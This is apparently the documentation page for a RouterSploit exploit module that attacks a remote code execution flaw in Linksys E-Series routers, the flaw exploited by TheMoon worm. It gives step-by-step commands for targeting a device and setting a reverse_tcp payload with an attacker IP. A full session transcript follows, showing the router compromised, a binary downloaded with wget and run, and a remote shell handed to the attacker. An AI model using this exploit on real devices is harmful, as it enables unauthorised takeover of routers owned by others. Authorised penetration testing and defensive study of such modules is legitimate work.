## Description

This module exploits remote code execution vulnerability in multiple Linksys E-Series devices.
Vulnerability was actively used by TheMoon worm.

## Verification Steps

    1. Start `./rsf.py`
    2. Do: `use exploits/routers/linksys/eseries_themoon_rce`
    3. Do `uset target [TargetIP]`
    4. Do `run`
    5. If router is vulnerable, it should be possible to execute commands on operating system level.

    6. Do `set payload reverse_tcp`
    7. Do `set lhost [AttackerIP]`
    8. Do `run`
    9. Payload is sent to device and executed providing attacker with the command shell.

## Scenarios

```
rsf > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Linksys E-Series TheMoon RCE) > run
[*] Running module...
[+] Target appears to be vulnerable

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > show payloads
[*] Available payloads:

   Payload         Name                   Description
   -------         ----                   -----------
   bind_tcp        MIPSBE Bind TCP        Creates interactive tcp bind shell for MIPSBE architecture.
   reverse_tcp     MIPSBE Reverse TCP     Creates interactive tcp reverse shell for MIPSBE architecture.

cmd > set payload reverse_tcp
cmd (MIPSBE Reverse TCP) > show options

Payload Options:

   Name      Current settings     Description
   ----      ----------------     -----------
   lhost                          Connect-back IP address
   lport     5555                 Connect-back TCP Port


cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4
lhost => 192.168.1.4
cmd (MIPSBE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from 192.168.1.1:41933
[+] Enjoy your shell
```